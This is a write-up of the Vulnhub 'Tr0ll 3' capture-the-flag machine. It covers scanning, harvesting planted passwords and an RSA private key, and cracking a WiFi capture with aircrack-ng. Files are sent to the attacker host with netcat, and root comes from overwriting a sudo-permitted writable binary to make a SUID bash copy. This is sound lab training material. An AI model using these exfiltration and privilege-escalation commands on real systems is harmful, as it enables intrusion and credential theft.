Vulnhub - Tr0ll 3

Recon

NMAP Complete Scan

# Nmap 7.92 scan initiated Fri Feb 25 17:06:11 2022 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /root/vulnHub/tr0ll3/192.168.110.35/scans/_full_tcp_nmap.txt -oX /root/vulnHub/tr0ll3/192.168.110.35/scans/xml/_full_tcp_nmap.xml 192.168.110.35
Nmap scan report for 192.168.110.35
Host is up, received arp-response (0.00093s latency).
Scanned at 2022-02-25 17:06:13 +08 for 8s
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6d:d1:ea:d0:a8:1e:83:ef:c7:4f:ae:4c:bb:d6:75:19 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCwbQDOa+6JujKY2lNNgrx9/W1YjX4TsL44aFRsN9wvlPEbpo84PoxLgHNKGOoYWPdhzPBYPWArJNOHDy4Bqf6h2873ppx9J4VcB0YXGCjUJiMzUIQj4Xo+UwZff8xEUfWtmBSKUZvgvFszXH6yfcOS9RTJ8KucYkthRJOcSVbkgzXODNFwh0+tNae/JndaMy/gCmufK9KsTomuSeeIDFZ3Vj44Js+f6lQAr43q9u5YSdA3PWaXjqjn7xLjQJJk2UXG8fCiskNeVB+mZoSUcKmyWGYNaIjXgS0WOTNyHrCex/wTGXbRKlbzr21r2QBaP0SbphMZvFKh55eZbFo73IX/
|   256 24:5f:cb:ef:3a:db:b5:59:c6:15:51:b9:2b:9b:fa:39 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMoi8hzvy7kA90UqPWmwvcT3BvV4uNT/jve0750bpivwlqI7Zb++BFXrWhY0IGDjgz4tJ6iT8gAGAHUQ6TJxs9I=
|   256 8b:96:de:4a:11:45:a7:f9:eb:60:9b:45:da:1a:21:de (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINOoGWk2LlHj3AJNTsUoGs6+4meQyZN33/UFAnujMMzy
MAC Address: 08:00:27:94:61:FC (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=2/25%OT=22%CT=1%CU=%PV=Y%DS=1%DC=D%G=N%M=080027%TM=621
OS:89C0D%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10B%TI=Z%CI=I%II=I%TS=A
OS:)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B
OS:4ST11NW7%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120
OS:)ECN(R=Y%DF=Y%TG=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%TG=40%S=O%A=
OS:S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%TG=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1
OS:(R=N)IE(R=Y%DFI=N%TG=40%CD=S)

Uptime guess: 39.064 days (since Mon Jan 17 15:34:32 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.93 ms 192.168.110.35

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Feb 25 17:06:21 2022 -- 1 IP address (1 host up) scanned in 11.19 seconds

Only TCP/22 (SSH) is up.

Initial Foothold

TCP/22 (SSH)

1. After turning on the machine, SSH credentials is given to us
   • start:here
2. SSH w/ start:here

Privilege Escalation

Eagle - Hidden Directory

1. View files in start’s home directory

    start@Tr0ll3:~/...$ cd ..
    start@Tr0ll3:~$ ls -la
    total 44
    drwx------  7 start start 4096 Feb 25 03:16 .
    drwxr-xr-x 10 root  root  4096 Jun 19  2015 ..
    drwxrwxr-x  2 start start 4096 Jun 19  2015 ...
    -rw-------  1 start start  114 Feb 25 03:16 .bash_history
    -rw-r--r--  1 start start  220 Jun 17  2015 .bash_logout
    -rw-r--r--  1 start start 3637 Jun 17  2015 .bashrc
    drwxrwxr-x  2 start start 4096 Jun 18  2015 bluepill
    drwx------  2 start start 4096 Jun 17  2015 .cache
    drwx------  3 start start 4096 Aug  1  2019 .gnupg
    -rw-r--r--  1 start start  675 Jun 17  2015 .profile
    drwxrwxr-x  2 start start 4096 Jun 17  2015 redpill
    start@Tr0ll3:~$ 
   

   • Interesting directories
     • ...
     • redpill
     • bluepill
2. View files in interesting directories
   • ...

       start@Tr0ll3:~$ cd ...
       start@Tr0ll3:~/...$ ls -la
       total 12
       drwxrwxr-x 2 start start 4096 Jun 19  2015 .
       drwx------ 7 start start 4096 Feb 25 03:16 ..
       -rw-rw-r-- 1 start start   13 Jun 19  2015 about_time
       start@Tr0ll3:~/...$ cat about_time 
       eagle:oxxwJo
       start@Tr0ll3:~/...$ 
     

     • eagle:oxxwJo
   • redpill

       start@Tr0ll3:~/bluepill$ cd ../redpill/
       start@Tr0ll3:~/redpill$ ls -la
       total 12
       drwxrwxr-x 2 start start 4096 Jun 17  2015 .
       drwx------ 7 start start 4096 Feb 25 03:16 ..
       -rw-rw-r-- 1 start start   17 Jun 17  2015 this_will_surely_work
       start@Tr0ll3:~/redpill$ cat this_will_surely_work 
       step2:Password1!
       start@Tr0ll3:~/redpill$
     

     • step2:Password1!
     • redpill is a rabbit hole
   • bluepill

       start@Tr0ll3:~$ cd bluepill/
       start@Tr0ll3:~/bluepill$ ls -la
       total 12
       drwxrwxr-x 2 start start 4096 Jun 18  2015 .
       drwx------ 7 start start 4096 Feb 25 03:16 ..
       -rw-rw-r-- 1 start start   18 Jun 17  2015 awesome_work
       start@Tr0ll3:~/bluepill$ cat awesome_work 
       http://bfy.tw/ODa
       start@Tr0ll3:~/bluepill$ 
     

     • bluepill is a rabbit hole
3. Switch to eagle w/ eagle:oxxwJo

   Wytshadow

4. Check eagle’s sudo access

    eagle@Tr0ll3:~$ sudo -l
    Matching Defaults entries for eagle on Tr0ll3:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
   
    User eagle may run the following commands on Tr0ll3:
        (root) /usr/sbin/service vsftpd start
   

   • /usr/sbin/service vsftpd start
5. Start vsftpd as root

    eagle@Tr0ll3:~$ sudo /usr/sbin/service vsftpd start
   

6. Check for newly opened ports

    ┌──(root💀kali)-[~/vulnHub/tr0ll3]
    └─# nmap $ip -p-
    Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-25 17:34 +08
    Nmap scan report for 192.168.110.35
    Host is up (0.00048s latency).
    Not shown: 65533 closed tcp ports (reset)
    PORT   STATE SERVICE
    21/tcp open  ftp
    22/tcp open  ssh
    MAC Address: 08:00:27:94:61:FC (Oracle VirtualBox virtual NIC)
   
    Nmap done: 1 IP address (1 host up) scanned in 5.04 seconds
   

   • TCP/21 (FTP)

Wytshadow - TCP/21 (FTP)

1. Access FTP w/ anonymous & check for write access

    ┌──(root💀kali)-[~/vulnHub/tr0ll3]
    └─# ftp $ip
    Connected to 192.168.110.35.
    220 Welcome Noob, you are still doing it wrong :)
    Name (192.168.110.35:root): anonymous
    331 Please specify the password.
    Password: 
    230 Login successful.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> dir
    229 Entering Extended Passive Mode (|||44032|)
    150 Here comes the directory listing.
    -rwxrwxrwx    1 0        0           49962 Aug 01  2019 wytshadow.cap
    226 Directory send OK.
    ftp> put test 
    local: test remote: test
    229 Entering Extended Passive Mode (|||65448|)
    550 Permission denied.
   
    ftp> 
   

2. Download wytshadow.cap

    ┌──(root💀kali)-[~/vulnHub/tr0ll3/192.168.110.35/loot/ftp]
    └─# ftp $ip
    Connected to 192.168.110.35.
    220 Welcome Noob, you are still doing it wrong :)
    Name (192.168.110.35:root): anonymous
    331 Please specify the password.
    Password: 
    230 Login successful.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> get wytshadow.cap
    local: wytshadow.cap remote: wytshadow.cap
    229 Entering Extended Passive Mode (|||36040|)
    150 Opening BINARY mode data connection for wytshadow.cap (49962 bytes).
    100% |************************************************************************| 49962        4.17 MiB/s    00:00 ETA
    226 Transfer complete.
    49962 bytes received in 00:00 (3.94 MiB/s)
    ftp> 
   

Wytshadow - Crack .cap file

1. wytshadow.cap captured WiFi traffic

    ┌──(root💀kali)-[~/vulnHub/tr0ll3/192.168.110.35/loot/ftp]
    └─# tcpdump -r wytshadow.cap 
    reading from file wytshadow.cap, link-type IEEE802_11 (802.11), snapshot length 65535
   

   • IEEE802_11
2. Failed to crack

    ┌──(root💀kali)-[~/tools/google-indexing-api-bulk]
    └─# aircrack-ng wytshadow.cap -w /usr/share/wordlists/rockyou.txt 
   

3. We have to obtain another wordlist, or this is a rabbit hole.

Wytshadow - Linpeas

1. Linpeas

    ╔══════════╣ Unexpected in root
    /vmlinuz
    /lol
    /initrd.img.old
    /gatein-management
    /.hints
    /gatein-sso
    /backups
    /vmlinuz.old
    /initrd.img
   

   • lol
   • .hints
2. View files in .hints directory

    eagle@Tr0ll3:/$ find .hints/
    .hints/
    .hints/lol
    .hints/lol/rofl
    .hints/lol/rofl/roflmao
    .hints/lol/rofl/roflmao/this
    .hints/lol/rofl/roflmao/this/isnt
    .hints/lol/rofl/roflmao/this/isnt/gonna
    .hints/lol/rofl/roflmao/this/isnt/gonna/stop
    .hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime
    .hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon
    .hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still
    .hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going
    .hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol
    .hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed
    .hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost
    .hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there
    .hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk
    .hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no
    .hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously
    .hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last
    .hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one
    .hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl
    .hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok
    .hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill
    .hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop
    .hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however
    .hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this
    .hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is
    .hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun
    .hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok
    .hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here
    .hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl
    .hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry
    .hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you
    .hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made
    .hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it
    .hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it/gold_star.txt
   

   • gold_star.txt
3. View gold_star.txt

    ┌──(root💀kali)-[~/vulnHub/tr0ll3/192.168.110.35/loot/ftp]
    └─# file gold_star.txt 
    gold_star.txt: ASCII text
   

   • Contains unreadable characters
4. Transfer gold_star.txt to kali

    eagle@Tr0ll3:/$ nc 192.168.110.4 4444 < .hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it/gold_star.txt
   
    ┌──(root💀kali)-[~/vulnHub/tr0ll3/192.168.110.35/loot/ftp]
    └─# nc -nvlp 4444 > gold_star.txt
    Ncat: Version 7.92 ( https://nmap.org/ncat )
    Ncat: Listening on :::4444
    Ncat: Listening on 0.0.0.0:4444
    Ncat: Connection from 192.168.110.35.
    Ncat: Connection from 192.168.110.35:51136.
   

Wytshadow - Crack .cap file

1. Crack .cap file w/ gold_star.txt wordlist

    ┌──(root💀kali)-[~/vulnHub/tr0ll3/192.168.110.35/loot/ftp]
    └─# aircrack-ng wytshadow.cap -w gold_star.txt 
   	
                                   Aircrack-ng 1.6 
   
          [00:09:21] 2426272/3248872 keys tested (4397.45 k/s) 
   
          Time left: 3 minutes, 7 seconds                           74.68%
   
                              KEY FOUND! [ gaUoCe34t1 ]
   
   
          Master Key     : ED 12 0B 40 F5 AF 80 16 F5 F7 4F 9F 9E 39 BB AE 
                           00 32 07 E9 26 81 31 DB 9C 54 64 84 5E 5D 19 C6 
   
          Transient Key  : 7F 1C A9 01 4E B9 B3 6F B3 95 7D D2 6E C9 10 BE 
                           50 D4 1A 6C 72 F8 AB 8B 97 A4 20 B1 2D 92 19 18 
                           C7 86 C0 17 2D 05 28 C7 6F 95 06 12 4F C2 F5 2A 
                           87 B7 F5 21 22 3D F7 CA BC 99 8B B5 CA 15 EA 43 
   
          EAPOL HMAC     : 73 4D E4 22 8E B7 F2 91 4E 74 7D CF 59 73 80 F7 
   
   

   • wytshadow:gaUoCe34t1
2. Switch to wytshadow w/ wytshadow:gaUoCe34t1

    eagle@Tr0ll3:/$ su wytshadow
    Password: gaUoCe34t1
    wytshadow@Tr0ll3:/$ 
   

Genphlux - SUDO

1. Check wytshadow’s sudo access

    wytshadow@Tr0ll3:/$ sudo -l
    [sudo] password for wytshadow: 
    Matching Defaults entries for wytshadow on Tr0ll3:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
   
    User wytshadow may run the following commands on Tr0ll3:
        (root) /usr/sbin/service nginx start
    wytshadow@Tr0ll3:/$ 
   

   • /usr/sbin/service nginx start
2. View files in wytshadow’s home directory

    wytshadow@Tr0ll3:~$ ls -la
    total 40
    drwx------  4 wytshadow wytshadow 4096 Aug  2  2019 .
    drwxr-xr-x 10 root      root      4096 Jun 19  2015 ..
    -rw-r--r--  1 wytshadow wytshadow  220 Jun 17  2015 .bash_logout
    -rw-r--r--  1 wytshadow wytshadow 3637 Jun 17  2015 .bashrc
    drwx------  2 wytshadow wytshadow 4096 Jun 17  2015 .cache
    drwx------  3 wytshadow wytshadow 4096 Aug  1  2019 .gnupg
    -rwsrwxrwx  1 genphlux  root      8566 Jun 17  2015 oohfun
    -rw-r--r--  1 wytshadow wytshadow  675 Jun 17  2015 .profile
    wytshadow@Tr0ll3:~$ 
   

   • oohfun
3. Execute oohfun to see what it does

    wytshadow@Tr0ll3:~$ ./oohfun 
    ...
    iM Cr@zY L1k3 AAA LYNX
    ...
   

   • LYNX is a web browser for command line interface
4. Start nginx as root

    wytshadow@Tr0ll3:~$ sudo /usr/sbin/service nginx start
   

5. Check for newly opened ports

    ┌──(root💀kali)-[~/vulnHub/tr0ll3/192.168.110.35/loot/ftp]
    └─# nmap $ip -p- -v
    PORT     STATE SERVICE
    21/tcp   open  ftp
    22/tcp   open  ssh
    8080/tcp open  http-proxy
    MAC Address: 08:00:27:94:61:FC (Oracle VirtualBox virtual NIC)
   

   • TCP/8080
6. Access TCP/8080 w/ LYNX

    ┌──(root💀kali)-[~/vulnHub/tr0ll3/192.168.110.35/loot]
    └─# lynx http://192.168.110.35:8080
   	
    genphlux:HF9nd0cR!
   

   • genphlux:HF9nd0cR!
7. Switch to genphlux w/ genphlux:HF9nd0cR!

    wytshadow@Tr0ll3:/tmp$ su genphlux
    Password: 
    genphlux@Tr0ll3:/tmp$ 
   

Malues - Creds Found (SSH Key)

1. Check genphlux’s sudo access

    genphlux@Tr0ll3:~$ sudo -l
    Matching Defaults entries for genphlux on Tr0ll3:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
   
    User genphlux may run the following commands on Tr0ll3:
        (root) /usr/sbin/service apache2 start
    genphlux@Tr0ll3:~$ 
   

   • /usr/sbin/service apache2 start
2. View files in genphlux’s home directory

    genphlux@Tr0ll3:~$ ls -la
    total 44
    drwx------  4 genphlux genphlux 4096 Aug  2  2019 .
    drwxr-xr-x 10 root     root     4096 Jun 19  2015 ..
    -rw-r--r--  1 genphlux genphlux  220 Jun 17  2015 .bash_logout
    -rw-r--r--  1 genphlux genphlux 3637 Jun 17  2015 .bashrc
    drwx------  2 genphlux genphlux 4096 Jun 17  2015 .cache
    drwx------  3 genphlux genphlux 4096 Aug  1  2019 .gnupg
    -rw-rw-r--  1 genphlux genphlux 1675 Jun 18  2015 maleus
    -rw-r--r--  1 genphlux genphlux  675 Jun 17  2015 .profile
    -rw-------  1 genphlux genphlux 5649 Jun 17  2015 .viminfo
    -rw-rw-r--  1 genphlux genphlux  931 Aug  2  2019 xlogin
    genphlux@Tr0ll3:~$ 
   

   • maleus
3. View contents of maleus

    genphlux@Tr0ll3:~$ cat maleus 
    -----BEGIN RSA PRIVATE KEY-----
    MIIEowIBAAKCAQEAwz5Hwer48U1t/Qi9JveuO+Z7WQlnmhOOs/2pZ0he/OyVsEFv
    DsGib1wu/N8t+7h9JZK9x2GL33TXQBVCy6TxES90F1An+2DSza6lJPCyhcgK/DEp
    yxSVt32A+lFo+PQJV6QYZlpRkek0MjUw5y/E5qZwdBypC55C4QzgQBN3+Lnuhuk4
    u52xcK9/6/2N7JZCNYA21Tp1Uy9mty/65IT7OwKJd2rXp3O6rZYTD/vPl+Rt/LtN
    gA1DbDODq0NCmvcrZL+SafSj+MABA3LCERw01gA4RMdyxJU6hVfjeSKOdwDQOGWe
    eAVCL2GR/frwyf+rfN1kbpdw/RGXWWwVANMcaQIDAQABAoIBAGNudFztrZo2NK2I
    pcwSl0kqN+dAQuLU0vgXVw6ibL2iPxlkOYrqUi8kY0mk32YyrolUEhJYO0Ox3W1l
    Zn8PoTV/VUAKMlJzHOhi6PfHHSPEnNOSthYWhajM4cKZczxWC+v2RfbaSHBms45e
    SGl0inJskRiRAAZKswSp6gq334FrS6Dwy1tiKvzCfR3kLQghV5U/PhFZCsq3xvAw
    eXPx2toNtU2gYSGrKWTep+nAKM1neBxeZAujYuN4xJ5/Th2y0pyTvX9WEgzKPJ/G
    PlYZYCUAKPCbabYSuZckjeiN1aS52AIFedECBfAIezOr08Wx/bI/xCOgBxrQgPrK
    kRvlOYECgYEA5eCIEfdLhWdg3ltadYE0O5VAoXKrbxYWqSyw1Eyeqj0N1qD9Rsvg
    jIQJazV5JcVBIF54f/jlCJozR5s5AELrY0Z/krea1lF5ecOSUQE3tp94298xzO3g
    7BBe3g6pD56Cya/Vo0+YVQmAnBHLh6QIYvUUXXN2IyceT8fhEx5JA+sCgYEA2W4z
    KKMVAdPxKcjVks1zdGmVlj1RsUkakYuLWV3jQe2w1naJrc37Khy5eWZaRJhXqeBb
    1cvTMa+r/BF7jvItxglWoBJqXDxKI0a6KqWtloZL2ynoaBkAhR2btob6nSN63Bpg
    ZYJKY1B5yYbDHK4k6QT7atn2g6DAv/7sW6skj/sCgYA16WTAIek6TjZvr6kVacng
    N27C7mu6T8ncvzhxcc68SjlWnscHtYTiL40t8YqKCyrs9nr4OF0umUtxfbvujcM6
    syv0Ms9DeDQvFGjaSpjQYbIsjrnVP+zCMEyvc2y+1wQBXRWTiXVGbEYXVC0RkKzO
    2H+AMzX/pIr9Vvk4TJ//JQKBgFNJcy9NyO46UVbAJ49kQ6WEDFjQhEp0xkiaO3aw
    EC1g7yw3m+WH0X4AIsvt+QXtlSbtWkA7I1sU/7w+tiW7fu0tBpGqfDN4pK1+mjFb
    5XKTXttE4lF9wkU7Yjo42ib3QEivkd1QW05PtVcM2BBUZK8dyXDUrSkemrbw33j9
    xbOhAoGBAL8uHuAs68ki/BWcmWUUer7Y+77YI/FFm3EvP270K5yn0WUjDJXwHpuz
    Fg3n294GdjBtQmvyf2Wxin4rxl+1aWuj7/kS1/Fa35n8qCN+lkBzfNVA7f626KRA
    wS3CudSkma8StmvgGKIU5YcO8f13/3QB6PPBgNoKnF5BlFFQJqhK
    -----END RSA PRIVATE KEY-----
   

   • Could be maleus private key
4. Transfer private key to kali

    ┌──(root💀kali)-[~/vulnHub/tr0ll3/192.168.110.35/loot]
    └─# nc -nvlp 4444 > id_rsa
    Ncat: Version 7.92 ( https://nmap.org/ncat )
    Ncat: Listening on :::4444
    Ncat: Listening on 0.0.0.0:4444
    Ncat: Connection from 192.168.110.35.
    Ncat: Connection from 192.168.110.35:51142.
   
    genphlux@Tr0ll3:~$ nc 192.168.110.4 4444 < maleus 
   
   

5. SSH w/ malues private key

Root - Creds Found (Password) + SUDO

1. View files in maleus’s home directory

    maleus@Tr0ll3:~$ find $(pwd)
    /home/maleus
    /home/maleus/.viminfo
    /home/maleus/.bashrc
    /home/maleus/.ssh
    /home/maleus/.ssh/maleus.pub
    /home/maleus/.ssh/maleus
    /home/maleus/.ssh/authorized_keys
    /home/maleus/dont_even_bother
    /home/maleus/.gnupg
    /home/maleus/.gnupg/private-keys-v1.d
    /home/maleus/.profile
    /home/maleus/.bash_logout
    /home/maleus/.cache
    /home/maleus/.cache/motd.legal-displayed
    maleus@Tr0ll3:~$ 
   

   • dont_even_bother
2. Execute dont_even_bother to see what it does

    maleus@Tr0ll3:~$ ./dont_even_bother
   
     Enter the password : 
   
   
     Wrong Password 
    maleus@Tr0ll3:~$ 
   

3. View contents of dont_even_bother w/ strings

    maleus@Tr0ll3:~$ strings dont_even_bother 
    /lib64/ld-linux-x86-64.so.2
    libc.so.6
    gets
    puts
    __stack_chk_fail
    strcmp
    __libc_start_main
    __gmon_start__
    GLIBC_2.4
    GLIBC_2.2.5
    UH-X
    UH-X
    []A\A]A^A_
     Enter the password : 
    xl8Fpx%6
     Wrong Password 
     Correct Password 
     Your reward is just knowing you did it! :-P 
    ;*3$"
    GCC: (Ubuntu 4.8.2-19ubuntu1) 4.8.2
   

   • xl8Fpx%6
4. Execute dont_even_bother specifying the password, xl8Fpx%6

    maleus@Tr0ll3:~$ ./dont_even_bother
   
     Enter the password : 
    xl8Fpx%6
   
     Correct Password 
   
     Your reward is just knowing you did it! :-P 
   

   • Rabbit Hole
5. View .viminfo

    maleus@Tr0ll3:~$ cat .viminfo 
    # This viminfo file was generated by Vim 7.4.
    # You may edit it if you're careful!
   
    # Value of 'encoding' when this file was written
    *encoding=utf-8
   
   
    # hlsearch on (H) or off (h):
    ~h
    # Command Line History (newest to oldest):
    :wq
    :q
    :q!
    :!shell
   
    # Search String History (newest to oldest):
   
    # Expression History (newest to oldest):
   
    # Input Line History (newest to oldest):
   
    # Input Line History (newest to oldest):
   
    # Registers:
    ""1	LINE	0
        passwd
    "2	LINE	0
        B^slc8I$
    "3	LINE	0
        passswd  
   
    # File marks:
   
    # Jumplist (newest first):
   
    # History of marks within files (newest to oldest):
   
        +	25	62
   
    > ~/Desktop/troll3/maleus
        *	1564779412	0
        "	27	28
        ^	27	29
        .	27	28
        +	27	28
    > ~/Desktop/troll3/maleus
        *	1564779412	0
        "	27	28
        ^	27	29
        .	27	28
        +	27	28
    > ~/Desktop/troll3/maleus
        *	1564779412	0
        "	27	28
        ^	27	29
        .	27	28
        +	27	28
    > ~/Desktop/troll3/maleus
        *	1564779412	0
        "	27	28
        ^	27	29
        .	27	28
        +	27	28
    > ~/Desktop/troll3/maleus
        *	1564779412	0
        "	27	28
        ^	27	29
        .	27	28
        +	27	28
    > ~/Desktop/troll3/maleus
        *	1564779412	0
        "	27	28
        ^	27	29
        .	27	28
        +	27	28
    > ~/Desktop/troll3/maleus
        *	1564779412	0
        "	27	28
        ^	27	29
        .	27	28
        +	27	28
    > ~/Desktop/troll3/maleus
        *	1564779412	0
        "	27	28
        ^	27	29
        .	27	28
        +	27	28
    > ~/Desktop/troll3/maleus
        *	1564779412	0
        "	27	28
        ^	27	29
        .	27	28
        +	27	28
   

   • B^slc8I$ is likely maleus’s password
6. Check maleus’s sudo access

    maleus@Tr0ll3:~$ sudo -l
    [sudo] password for maleus: B^slc8I$
    Matching Defaults entries for maleus on Tr0ll3:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
   
    User maleus may run the following commands on Tr0ll3:
        (root) /home/maleus/dont_even_bother
   

   • /home/maleus/dont_even_bother
7. View permission of /home/maleus/dont_even_bother binary

    maleus@Tr0ll3:~$ ls -l  /home/maleus/dont_even_bother
    -rwxrwxr-x 1 maleus maleus 8674 Jun 18  2015 /home/maleus/dont_even_bother
   

   • We have write access
8. Replace /home/maleus/dont_even_bother w/ a binary to spawn a root shell

    maleus@Tr0ll3:~$ printf '#!/bin/bash\n\ncp /bin/bash /tmp/rootbash && chmod u+s /tmp/rootbash\n' > /home/maleus/dont_even_bother; chmod 4777 /home/maleus/dont_even_bother
   

9. Execute /home/maleus/dont_even_bother as root to create a root shell

    maleus@Tr0ll3:~$ sudo /home/maleus/dont_even_bother
    maleus@Tr0ll3:~$ ls -l /tmp
    total 2092
    -rw-r--r-- 1 eagle     russ       118013 Feb 25 04:29 eagle.out
    -rw-rw-r-- 1 start     start      117861 Feb 25 04:26 linpeas.out
    -rwxrwxrwx 1 start     start      762836 Dec 31 09:16 linpeas.sh
    -rwsr-xr-x 1 root      root      1113504 Feb 25 13:11 rootbash # SUID Bit is set
   

10. Obtain root shell

    rootbash-4.4# id;whoami
    uid=1000(maleus) gid=1000(maleus) euid=0(root) groups=1000(maleus),1005(backups)
    root
    rootbash-4.4# 
    

11. Root Flag

    rootbash-4.4# cd /root
    rootbash-4.4# ls
    flag.txt
    rootbash-4.4# cat flag.txt 
    You are truly a Jedi!
    
    Twitter Proof:
    
    Pr00fThatTh3L33tHax0rG0tTheFl@g!!
    
    @Maleus21
    
    
    rootbash-4.4#